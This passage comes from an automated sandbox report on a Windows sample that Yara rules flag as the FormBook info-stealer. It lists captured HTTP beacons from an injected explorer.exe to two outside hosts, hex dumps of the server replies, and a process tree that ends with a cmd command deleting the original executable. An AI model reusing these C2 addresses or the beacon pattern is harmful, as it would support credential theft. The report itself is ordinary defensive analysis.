                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Upa+5FF8IgP0FoNjtcDfTjRq+ugDfYoFpjAOTEUl1bDMy07A7J2kY88sO6z5hnC/yeJa/WQcu/oKCcbpKXnFWg==
                                                    Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 70 61 2b 35 46 46 38 49 67 50 30 46 6f 4e 6a 74 63 44 66 54 6a 52 71 2b 75 67 44 66 59 6f 46 70 6a 41 4f 54 45 55 6c 31 62 44 4d 79 30 37 41 37 4a 32 6b 59 38 38 73 4f 36 7a 35 68 6e 43 2f 79 65 4a 61 2f 57 51 63 75 2f 6f 4b 43 63 62 70 4b 58 6e 46 57 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Upa+5FF8IgP0FoNjtcDfTjRq+ugDfYoFpjAOTEUl1bDMy07A7J2kY88sO6z5hnC/yeJa/WQcu/oKCcbpKXnFWg=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.749754185.78.22.7480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:22:24.919759989 CET9433OUTGET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1
                                                    Host: www.borokish.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:22:25.049778938 CET9434INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Wed, 13 Jan 2021 20:22:24 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: close
                                                    Location: https://www.borokish.com/nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.74975634.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:23:28.085913897 CET9446OUTGET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1
                                                    Host: www.wingateofhouston.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:23:28.224693060 CET9447INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:23:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5ffc838f-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:21:20:40
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\74852.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\74852.exe'
                                                    Imagebase:0x230000
                                                    File size:237056 bytes
                                                    MD5 hash:E295CB54968CB6F3575A7CAF32FE7F5A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:21:20:41
                                                    Start date:13/01/2021
                                                    Path:C:\Users\user\Desktop\74852.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\74852.exe'
                                                    Imagebase:0x230000
                                                    File size:237056 bytes
                                                    MD5 hash:E295CB54968CB6F3575A7CAF32FE7F5A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:21:20:45
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff662bf0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:21:21:00
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                    Imagebase:0x1250000
                                                    File size:23040 bytes
                                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:21:21:05
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\74852.exe'
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:21:21:05
                                                    Start date:13/01/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff774ee0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >